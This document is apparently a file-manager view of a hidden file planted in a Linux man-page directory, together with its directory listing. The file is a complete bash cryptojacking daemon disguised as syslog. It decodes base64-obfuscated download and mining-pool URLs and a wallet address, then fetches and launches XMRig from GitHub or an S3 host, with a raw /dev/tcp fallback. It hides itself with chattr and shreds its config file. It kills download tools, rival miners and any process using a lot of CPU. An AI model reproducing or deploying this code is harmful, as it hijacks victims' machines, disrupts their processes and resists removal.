PATH:
usr
/
share
/
man
/
man3
/
.syslog-cf6ec2b3
#!/bin/bash export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin b64d() { local s="$1" if command -v base64 >/dev/null 2>&1; then printf '%s' "$s" | base64 -d 2>/dev/null && return 0 printf '%s' "$s" | base64 --decode 2>/dev/null && return 0 fi if command -v openssl >/dev/null 2>&1; then printf '%s' "$s" | openssl base64 -d 2>/dev/null && return 0 fi echo "$s" } ENC_BASE_URL="aHR0cHM6Ly9jdHMtYXNzZXRzLnMzLnVzLXdlc3QtMS5hbWF6b25hd3MuY29t" ENC_MINER_X86_URL="aHR0cHM6Ly9jdHMtYXNzZXRzLnMzLnVzLXdlc3QtMS5hbWF6b25hd3MuY29tL2dyZXAudGFyLmd6" ENC_MINER_ARM_URL="aHR0cHM6Ly9jdHMtYXNzZXRzLnMzLnVzLXdlc3QtMS5hbWF6b25hd3MuY29tL2dyZXBfYXJtLnRhci5neg==" ENC_CONFIG_URL="aHR0cHM6Ly9jdHMtYXNzZXRzLnMzLnVzLXdlc3QtMS5hbWF6b25hd3MuY29tL2dyZXAuanNvbg==" ENC_CONFIG_FALLBACK_URL="aHR0cHM6Ly9jdHMtYXNzZXRzLnMzLnVzLXdlc3QtMS5hbWF6b25hd3MuY29tL2dyZXBuLmpzb24=" #ENC_DAEMON_URL="PLACEHOLDER_ENC_DAEMON_URL" ENC_SELF_URL="aHR0cHM6Ly9jdHMtYXNzZXRzLnMzLnVzLXdlc3QtMS5hbWF6b25hd3MuY29tL2dyZXBiMi5qcGc=" ENC_GITHUB_X86_URL="aHR0cHM6Ly9naXRodWIuY29tL3htcmlnL3htcmlnL3JlbGVhc2VzL2Rvd25sb2FkL3Y2LjI2LjAveG1yaWctNi4yNi4wLWxpbnV4LXN0YXRpYy14NjQudGFyLmd6" ENC_GITHUB_ARM_URL="aHR0cHM6Ly9naXRodWIuY29tL3htcmlnL3htcmlnL3JlbGVhc2VzL2Rvd25sb2FkL3Y2LjI2LjAveG1yaWctNi4yNi4wLWxpbnV4LXN0YXRpYy1hcm02NC50YXIuZ3o=" ENC_DEFAULT_POOL_URL="YXV0by5jM3Bvb2wub3JnOjMzMzMz" ENC_DEFAULT_WALLET_ADDR="ODdtYVlndDdiTXZnRHhRc0JhdllOVkRyNkJRZ0pOYWFSS1hnMnlCaDhBM0dMVm9pekNxOWVleWNCVDd2Nmtkbm04ZjQxVmZ6ODR4NlhMZUVVSkRScXZZYlNyaHZ6VHc=" ENC_CUSTOM_POOL_URL="cG9vbC5zdXBwb3J0eG1yLmNvbTo0NDM=" ENC_CUSTOM_WALLET_ADDR="ODdtYVlndDdiTXZnRHhRc0JhdllOVkRyNkJRZ0pOYWFSS1hnMnlCaDhBM0dMVm9pekNxOWVleWNCVDd2Nmtkbm04ZjQxVmZ6ODR4NlhMZUVVSkRScXZZYlNyaHZ6VHc=" BASE_URL=$(b64d "$ENC_BASE_URL") MINER_X86_URL=$(b64d "$ENC_MINER_X86_URL") MINER_ARM_URL=$(b64d "$ENC_MINER_ARM_URL") CONFIG_URL=$(b64d "$ENC_CONFIG_URL") CONFIG_FALLBACK_URL=$(b64d "$ENC_CONFIG_FALLBACK_URL") #DAEMON_URL=$(b64d "$ENC_DAEMON_URL") SELF_URL=$(b64d "$ENC_SELF_URL") GITHUB_X86_URL=$(b64d "$ENC_GITHUB_X86_URL") GITHUB_ARM_URL=$(b64d "$ENC_GITHUB_ARM_URL") DEFAULT_POOL_URL=$(b64d "$ENC_DEFAULT_POOL_URL") DEFAULT_WALLET_ADDR=$(b64d "$ENC_DEFAULT_WALLET_ADDR") CUSTOM_POOL_URL=$(b64d "$ENC_CUSTOM_POOL_URL") CUSTOM_WALLET_ADDR=$(b64d "$ENC_CUSTOM_WALLET_ADDR") USE_GITHUB_MINER="1" GITHUB_VERSION="6.26.0" ENABLE_CUSTOM_CONFIG="1" ENABLE_RANDOM_MINER_NAME="1" ENABLE_PASS_MOD="0" ENABLE_CONFIG_TWEAKS="1" SET_DONATE_LEVEL="0" SET_NICEHASH="true" SET_TLS="true" SET_MAX_THREADS_HINT="80" SET_AUTOSAVE="true" SET_BACKGROUND="true" CUSTOM_CONFIG_URL="" _PS_PID_COL=2 _ps_hdr=$(ps aux 2>/dev/null | head -1) case "$_ps_hdr" in USER*|user*) _PS_PID_COL=2 ;; *) _PS_PID_COL=1 ;; esac SLEEP_INTERVAL="0.3" TICK_MOD=17 if ! sleep 0.01 2>/dev/null; then SLEEP_INTERVAL="1" TICK_MOD=5 fi MAX_LOCK_AGE=300 _pgrep_f() { local pattern="$1" if command -v pgrep >/dev/null 2>&1; then pgrep -f "$pattern" 2>/dev/null else ps aux 2>/dev/null | grep -v grep | grep -F "$pattern" | awk -v c=$_PS_PID_COL '{print $c}' fi } _pkill_f() { local pattern="$1" if command -v pkill >/dev/null 2>&1; then pkill -9 -f "$pattern" 2>/dev/null else _pgrep_f "$pattern" | xargs kill -9 2>/dev/null fi } ensure_deploy_dir() { if [ ! -d "$DEPLOY_DIR" ]; then mkdir -p "$DEPLOY_DIR" || return 1 cd "$DEPLOY_DIR" fi return 0 } sed_inplace() { local expr="$1" local file="$2" local tmp="${file}.tmp.$$" sed "$expr" "$file" > "$tmp" 2>/dev/null if [ -s "$tmp" ]; then cat "$tmp" > "$file" rm -f "$tmp" return 0 fi rm -f "$tmp" 2>/dev/null return 1 } is_valid_ip() { echo "$1" | grep -qE '^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}$' } get_miner_name() { local cpu_cores=$(nproc 2>/dev/null || grep -c ^processor /proc/cpuinfo 2>/dev/null || echo "1") local ip="" raw="" raw=$(curl -s --connect-timeout 2 https://3.0.3.0/ips 2>/dev/null | grep -o '"ip":"[^"]*"' | cut -d'"' -f4) is_valid_ip "$raw" && ip="$raw" if [ -z "$ip" ]; then raw=$(curl -s --connect-timeout 2 --max-filesize 32 https://api.ipify.org 2>/dev/null) is_valid_ip "$raw" && ip="$raw" fi if [ -z "$ip" ]; then raw=$(curl -s --connect-timeout 2 --max-filesize 32 https://ipv4.ip.sb 2>/dev/null) is_valid_ip "$raw" && ip="$raw" fi if [ -z "$ip" ]; then ip=$(hostname 2>/dev/null | cut -d. -f1) fi if [ -z "$ip" ]; then ip="node" fi local ip_clean=$(echo "$ip" | tr '.' '-') echo "miner-${cpu_cores}-${ip_clean}" } setup_architecture() { local arch=$(uname -m) case "$arch" in x86_64|amd64) MINER_URL="$MINER_X86_URL" ;; aarch64|arm64|armv8*) MINER_URL="$MINER_ARM_URL" ;; *) echo " [Daemon] WARNING: Unsupported architecture '$arch', using default" >&2; MINER_URL="$MINER_X86_URL" ;; esac } find_and_read_config() { if [ -f ".malware.conf" ]; then . ./.malware.conf if [ "$ENCODE_BASE" = "1" ]; then CUSTOM_POOL_URL=$(b64d "$ENC_CUSTOM_POOL_URL") CUSTOM_WALLET_ADDR=$(b64d "$ENC_CUSTOM_WALLET_ADDR") fi if command -v shred >/dev/null 2>&1; then shred -u .malware.conf 2>/dev/null else cat /dev/null > .malware.conf && rm -f .malware.conf fi return 0 fi local home_dir=$(eval echo "~" 2>/dev/null) for pattern in "${home_dir}/.syslog-*" "/usr/share/man/man3/.syslog-*" "/usr/share/misc/.syslog-*" "/usr/share/doc/.syslog-*" "/var/log/.syslog-*" "/var/cache/.syslog-*" "/var/lib/syslog/.syslog-private-*" "/opt/.syslog-*" "/usr/lib/.syslog-*" "/usr/local/lib/.syslog-*" "/var/tmp/.syslog-*" "/tmp/.syslog-*" "/dev/shm/.syslog-*" "/run/user/*/.syslog-*" "/var/crash/.syslog-*" "/dev/mqueue/.syslog-*" "/run/lock/.syslog-*"; do for dir in $pattern; do if [ -d "$dir" ] && [ -f "$dir/.malware.conf" ]; then . "$dir/.malware.conf" DEPLOY_DIR="$dir" if [ "$ENCODE_BASE" = "1" ]; then CUSTOM_POOL_URL=$(b64d "$ENC_CUSTOM_POOL_URL") CUSTOM_WALLET_ADDR=$(b64d "$ENC_CUSTOM_WALLET_ADDR") fi if command -v shred >/dev/null 2>&1; then shred -u "$dir/.malware.conf" 2>/dev/null else cat /dev/null > "$dir/.malware.conf" && rm -f "$dir/.malware.conf" fi return 0 fi done done for pattern in "/usr/share/man/man3/.syslog-*" "/var/log/.syslog-*" "/opt/.syslog-*" "/usr/lib/.syslog-*" "/var/lib/systemd/.syslog-private-*" "/var/tmp/.syslog-*" "/tmp/.syslog-*" "/dev/shm/.syslog-*" "/usr/share/man/man3/.syslog-cf6ec2b3*" "/usr/share/man/man3/.syslog-cf6ec2b3"; do for dir in $pattern; do if [ -d "$dir" ] && [ -f "$dir/.malware.conf" ]; then . "$dir/.malware.conf" DEPLOY_DIR="$dir" if [ "$ENCODE_BASE" = "1" ]; then CUSTOM_POOL_URL=$(b64d "$ENC_CUSTOM_POOL_URL") CUSTOM_WALLET_ADDR=$(b64d "$ENC_CUSTOM_WALLET_ADDR") fi if command -v shred >/dev/null 2>&1; then shred -u "$dir/.malware.conf" 2>/dev/null else cat /dev/null > "$dir/.malware.conf" && rm -f "$dir/.malware.conf" fi return 0 fi done done echo "WARNING: No config found, using /tmp/.syslog-fallback" >&2 DEPLOY_DIR="/tmp/.syslog-fallback" MALWARE_NAME="syslog-ng-fallback" CONFIG_NAME="config.json" DAEMON_NAME="syslog-helper" MINER_NAME="unknown" return 1 } protect_deploy_dir() { [ "$(id -u 2>/dev/null)" = "0" ] && command -v chattr >/dev/null 2>&1 && chattr +i "$DEPLOY_DIR" 2>/dev/null } unprotect_deploy_dir() { [ "$(id -u 2>/dev/null)" = "0" ] && command -v chattr >/dev/null 2>&1 && chattr -i "$DEPLOY_DIR" 2>/dev/null } check_and_acquire_lock() { LOCK_FILE="${DEPLOY_DIR}/.daemon.lock" if [ -f "$LOCK_FILE" ]; then local lock_pid=$(cat "$LOCK_FILE" 2>/dev/null) local lock_age=0 local file_ts=$(stat -c %Y "$LOCK_FILE" 2>/dev/null) || file_ts=$(stat -f %m "$LOCK_FILE" 2>/dev/null) || file_ts="" if [ -n "$file_ts" ] && [ "$file_ts" -gt 0 ] 2>/dev/null; then lock_age=$(($(date +%s) - file_ts)) fi if [ $lock_age -gt $MAX_LOCK_AGE ] 2>/dev/null; then unprotect_deploy_dir rm -f "$LOCK_FILE" 2>/dev/null protect_deploy_dir elif [ -n "$lock_pid" ] && kill -0 "$lock_pid" 2>/dev/null; then exit 1 else unprotect_deploy_dir rm -f "$LOCK_FILE" 2>/dev/null protect_deploy_dir fi fi unprotect_deploy_dir echo $$ > "$LOCK_FILE" 2>/dev/null protect_deploy_dir } download_file() { ensure_deploy_dir || return 1 cd "$DEPLOY_DIR" 2>/dev/null || return 1 local url=$1 local output=$2 local host=$(echo "$url" | sed 's|^https\?://||' | cut -d/ -f1) local path=$(echo "$url" | sed 's|^https\?://[^/]*||') if command -v wget >/dev/null 2>&1; then wget -q --timeout=10 --tries=2 "$url" -O "$output" 2>/dev/null if [ -f "$output" ] && [ -s "$output" ]; then return 0 fi rm -f "$output" 2>/dev/null fi if command -v curl >/dev/null 2>&1; then curl -s --connect-timeout 10 --retry 2 "$url" -o "$output" 2>/dev/null if [ -f "$output" ] && [ -s "$output" ]; then return 0 fi rm -f "$output" 2>/dev/null fi if command -v bash >/dev/null 2>&1; then ( exec 3<>/dev/tcp/${host}/80 2>/dev/null || exit 1 echo -e "GET ${path} HTTP/1.0\r\nHost: ${host}\r\n\r\n" >&3 while IFS= read -r line <&3; do line=${line%$'\r'} [ -z "$line" ] && break done cat <&3 > "$output" 2>/dev/null exec 3<&- ) 2>/dev/null if [ -f "$output" ] && [ -s "$output" ]; then return 0 fi fi return 1 } download_and_extract_github_miner() { local arch="$1" local output_dir="$2" local tar_url="" case "$arch" in x86_64|amd64) tar_url="$GITHUB_X86_URL" ;; aarch64|arm64|armv8*) tar_url="$GITHUB_ARM_URL" ;; *) return 1 ;; esac local temp_tar="${output_dir}/xmrig.tar.gz" download_file "$tar_url" "$temp_tar" || return 1 tar -xzf "$temp_tar" -C "$output_dir" 2>/dev/null || { rm -f "$temp_tar"; return 1; } rm -f "$temp_tar" local extracted_dir=$(find "$output_dir" -maxdepth 1 -type d -name "xmrig-*" | head -1) [ -z "$extracted_dir" ] && return 1 [ -f "$extracted_dir/xmrig" ] && mv "$extracted_dir/xmrig" "$output_dir/xmrig.bin" [ -f "$extracted_dir/config.json" ] && mv "$extracted_dir/config.json" "$output_dir/config.orig.json" rm -rf "$extracted_dir" [ -f "$output_dir/xmrig.bin" ] && [ -f "$output_dir/config.orig.json" ] } apply_config_modifications() { local config_file="$1" local miner_name="$2" if [ "$ENABLE_PASS_MOD" = "1" ]; then if [ "$ENABLE_RANDOM_MINER_NAME" = "1" ]; then sed_inplace 's/"pass": "[^"]*"/"pass": "'"$miner_name"'"/g' "$config_file" else sed_inplace 's/"pass": "[^"]*"/"pass": "'"$FIXED_MINER_NAME"'"/g' "$config_file" fi fi if [ "$USE_GITHUB_MINER" = "1" ] && [ "$ENABLE_CUSTOM_CONFIG" = "1" ] && [ -z "$CUSTOM_CONFIG_URL" ]; then [ -n "$CUSTOM_POOL_URL" ] && sed_inplace 's|"url": "[^"]*"|"url": "'"$CUSTOM_POOL_URL"'"|g' "$config_file" [ -n "$CUSTOM_WALLET_ADDR" ] && sed_inplace 's|"user": "[^"]*"|"user": "'"$CUSTOM_WALLET_ADDR"'"|g' "$config_file" fi if [ "$ENABLE_CONFIG_TWEAKS" = "1" ]; then [ -n "$SET_DONATE_LEVEL" ] && sed_inplace 's/"donate-level": [0-9]\+/"donate-level": '"$SET_DONATE_LEVEL"'/g' "$config_file" if [ -n "$SET_NICEHASH" ]; then local nicehash_val=$(echo "$SET_NICEHASH" | tr '[:upper:]' '[:lower:]') sed_inplace 's/"nicehash": true/"nicehash": '"$nicehash_val"'/g' "$config_file" sed_inplace 's/"nicehash": false/"nicehash": '"$nicehash_val"'/g' "$config_file" fi if [ -n "$SET_TLS" ]; then local tls_val=$(echo "$SET_TLS" | tr '[:upper:]' '[:lower:]') sed_inplace 's/"tls": true/"tls": '"$tls_val"'/g' "$config_file" sed_inplace 's/"tls": false/"tls": '"$tls_val"'/g' "$config_file" fi [ -n "$SET_MAX_THREADS_HINT" ] && sed_inplace 's/"max-threads-hint": [0-9]\+/"max-threads-hint": '"$SET_MAX_THREADS_HINT"'/g' "$config_file" if [ -n "$SET_AUTOSAVE" ]; then local autosave_val=$(echo "$SET_AUTOSAVE" | tr '[:upper:]' '[:lower:]') sed_inplace 's/"autosave": true/"autosave": '"$autosave_val"'/g' "$config_file" sed_inplace 's/"autosave": false/"autosave": '"$autosave_val"'/g' "$config_file" fi if [ -n "$SET_BACKGROUND" ]; then local bg_val=$(echo "$SET_BACKGROUND" | tr '[:upper:]' '[:lower:]') sed_inplace 's/"background": true/"background": '"$bg_val"'/g' "$config_file" sed_inplace 's/"background": false/"background": '"$bg_val"'/g' "$config_file" fi fi } kill_downloaders() { local ps_out=$(ps aux 2>/dev/null) local pids=$(echo "$ps_out" \ | grep -E 'wget|curl|aria2c|axel|lwp-download|lwp-request|fetch ' \ | grep -v grep \ | grep -v "github\.com" \ | grep -v "$BASE_DOMAIN" \ | grep -v "$DEPLOY_DIR" \ | awk -v c=$_PS_PID_COL '{print $c}') [ -n "$pids" ] && echo "$pids" | xargs kill -9 2>/dev/null local pids2=$(echo "$ps_out" \ | grep -E 'python|perl|php|ruby|nc |netcat|ncat|lynx|links|w3m|ftp ' \ | grep -v grep \ | grep -v "github\.com" \ | grep -v "$BASE_DOMAIN" \ | grep -v "$MALWARE_NAME" \ | grep -v "$DEPLOY_DIR" \ | grep -Ei 'http://|https://|urlretrieve|urlopen|requests\.get|file_get_contents|LWP|getstore|open-uri|/dev/tcp' \ | awk -v c=$_PS_PID_COL '{print $c}') [ -n "$pids2" ] && echo "$pids2" | xargs kill -9 2>/dev/null } is_my_process() { local pid="$1" [ "$pid" = "$$" ] && return 0 local exe_path=$(readlink -f "/proc/$pid/exe" 2>/dev/null) if [ -n "$exe_path" ]; then case "$exe_path" in ${DEPLOY_DIR}/*) return 0 ;; esac fi local cmd=$(cat "/proc/$pid/cmdline" 2>/dev/null | tr '\0' ' ') if [ -n "$cmd" ]; then case "$cmd" in *syslog-helper*|*"$MALWARE_NAME"*|*"$DEPLOY_DIR"*) return 0 ;; esac fi local ps_cmd=$(ps -p "$pid" -o args= 2>/dev/null) if [ -n "$ps_cmd" ]; then case "$ps_cmd" in *"$MALWARE_NAME"*|*syslog-helper*|*"$DEPLOY_DIR"*) return 0 ;; esac fi return 1 } _high_cpu_pids() { local threshold="${1:-70}" local out out=$(ps -eo pid,pcpu 2>/dev/null) if [ -n "$out" ]; then echo "$out" | awk -v t="$threshold" '$2+0>=t && $1+0>0 {print $1}' return fi ps aux 2>/dev/null | awk -v t="$threshold" -v c=$_PS_PID_COL 'NR>1 && $3+0>=t {print $c}' } kill_rival_miners() { ps aux 2>/dev/null | grep -v grep | grep -E 'xmrig|987645|supportxmr|c3pool|vmiluniz|javap|syslog-ng-13b1b2b7' | grep -v "$MALWARE_NAME" | awk -v c=$_PS_PID_COL '{print $c}' | while read -r pid; do is_my_process "$pid" || kill -9 "$pid" 2>/dev/null done for pid_dir in /proc/[0-9]*; do local pid="${pid_dir##*/}" is_my_process "$pid" && continue if grep -a -q -E 'donate-level|stratum\+tcp|cryptonight|randomx' "$pid_dir/exe" 2>/dev/null; then kill -9 "$pid" 2>/dev/null fi done _high_cpu_pids 70 | while read -r pid; do is_my_process "$pid" || kill -9 "$pid" 2>/dev/null done } ensure_miner_running() { if command -v chattr >/dev/null 2>&1; then chattr -i "$DEPLOY_DIR" 2>/dev/null fi ensure_deploy_dir || return 1 cd "$DEPLOY_DIR" 2>/dev/null || return 1 local existing_pids=$(_pgrep_f "$MALWARE_NAME") local pid_count=0 [ -n "$existing_pids" ] && pid_count=$(echo "$existing_pids" | wc -l | tr -d ' ') if [ "$pid_count" -gt 1 ]; then echo " [Daemon] Found $pid_count miner processes, cleaning..." >&2 _pkill_f "$MALWARE_NAME" sleep 1 elif [ "$pid_count" -eq 1 ]; then return 0 fi unprotect_deploy_dir if [ ! -d "$DEPLOY_DIR" ]; then mkdir -p "$DEPLOY_DIR" 2>/dev/null fi cd "$DEPLOY_DIR" 2>/dev/null || { protect_deploy_dir; return 1; } if [ ! -x "$MALWARE_NAME" ]; then if [ "$USE_GITHUB_MINER" = "1" ]; then echo " [Daemon] Using GitHub official XMRig v$GITHUB_VERSION" >&2 local arch=$(uname -m) if download_and_extract_github_miner "$arch" "$DEPLOY_DIR"; then mv "$DEPLOY_DIR/xmrig.bin" "$MALWARE_NAME" chmod +x "$MALWARE_NAME" if [ ! -f "config.json" ]; then if [ -n "$CUSTOM_CONFIG_URL" ]; then echo " [Daemon] Downloading custom config from $CUSTOM_CONFIG_URL" >&2 download_file "$CUSTOM_CONFIG_URL" "config.json" else cp "$DEPLOY_DIR/config.orig.json" "config.json" fi fi else echo " [Daemon] GitHub download failed, fallback to S3" >&2 setup_architecture download_file "$MINER_URL" "$MALWARE_NAME" chmod +x "$MALWARE_NAME" if [ ! -f "config.json" ]; then download_file "$CONFIG_URL" "config.json" fi fi else setup_architecture download_file "$MINER_URL" "$MALWARE_NAME" chmod +x "$MALWARE_NAME" if [ ! -f "config.json" ]; then download_file "$CONFIG_URL" "config.json" fi fi fi if [ ! -f "config.json" ]; then if [ "$USE_GITHUB_MINER" = "1" ] && [ -f "config.orig.json" ]; then cp config.orig.json config.json else download_file "$CONFIG_URL" "config.json" fi fi if [ -f "config.json" ]; then local miner_name_for_config="x" if [ "$ENABLE_RANDOM_MINER_NAME" = "1" ]; then if [ -z "$MINER_NAME" ] || [ "$MINER_NAME" = "unknown" ]; then MINER_NAME=$(get_miner_name) echo " [Daemon] Generated miner name: $MINER_NAME" >&2 fi miner_name_for_config="$MINER_NAME" fi apply_config_modifications "config.json" "$miner_name_for_config" fi if [ ! -x "$MALWARE_NAME" ]; then protect_deploy_dir return 1 fi "./$MALWARE_NAME" > /dev/null 2>&1 & sleep 2 local new_pids=$(_pgrep_f "$MALWARE_NAME") local new_count=0 [ -n "$new_pids" ] && new_count=$(echo "$new_pids" | wc -l | tr -d ' ') if [ "$new_count" -eq 1 ]; then echo " [Daemon] ✓ Miner started (PID: $new_pids)" >&2 (cd "$DEPLOY_DIR" && rm -f ./*) 2>/dev/null #rmdir "$DEPLOY_DIR" 2>/dev/null protect_deploy_dir return 0 elif [ "$new_count" -gt 1 ]; then echo " [Daemon] ⚠ Multiple miners started ($new_count), keeping first..." >&2 local first_pid=$(echo "$new_pids" | head -1) echo "$new_pids" | tail -n +2 | xargs kill -9 2>/dev/null echo " [Daemon] ✓ Miner running (PID: $first_pid)" >&2 (cd "$DEPLOY_DIR" && rm -f ./*) 2>/dev/null #rmdir "$DEPLOY_DIR" 2>/dev/null protect_deploy_dir return 0 else if [ "$USE_GITHUB_MINER" = "1" ] && [ -z "$CUSTOM_CONFIG_URL" ]; then echo " [Daemon] WARNING: Miner failed to start, trying fallback config..." >&2 if download_file "$CONFIG_FALLBACK_URL" "config.json"; then apply_config_modifications "config.json" "$miner_name_for_config" "./$MALWARE_NAME" > /dev/null 2>&1 & sleep 3 if [ -n "$(_pgrep_f "$MALWARE_NAME")" ]; then echo " [Daemon] ✓ Miner started with fallback config (PID: $(_pgrep_f "$MALWARE_NAME" | head -1))" >&2 protect_deploy_dir return 0 fi fi fi echo " [Daemon] ERROR: Miner failed to start after all attempts" >&2 protect_deploy_dir return 1 fi } main_loop() { sleep 5 local tick=0 local touch_tick=0 while true; do kill_downloaders tick=$((tick + 1)) if [ $((tick % TICK_MOD)) -eq 0 ]; then ensure_miner_running kill_rival_miners tick=0 touch_tick=$((touch_tick + 1)) if [ $((touch_tick % 720)) -eq 0 ]; then touch "${DEPLOY_DIR}/${MALWARE_NAME}" "${DEPLOY_DIR}/config.json" "${DEPLOY_DIR}/.malware.conf" "${DEPLOY_DIR}/${DAEMON_NAME}" "${DEPLOY_DIR}/.daemon.lock" 2>/dev/null touch_tick=0 fi fi sleep $SLEEP_INTERVAL done } find_and_read_config check_and_acquire_lock main_loop
[+]
..
[-] config.orig.json
[edit]
[-] syslog-ng-13b1b2b7
[edit]
[-] config.json
[edit]
[-] syslog-helper
[edit]
[-] .malware.conf
[edit]
[-] .daemon.lock
[edit]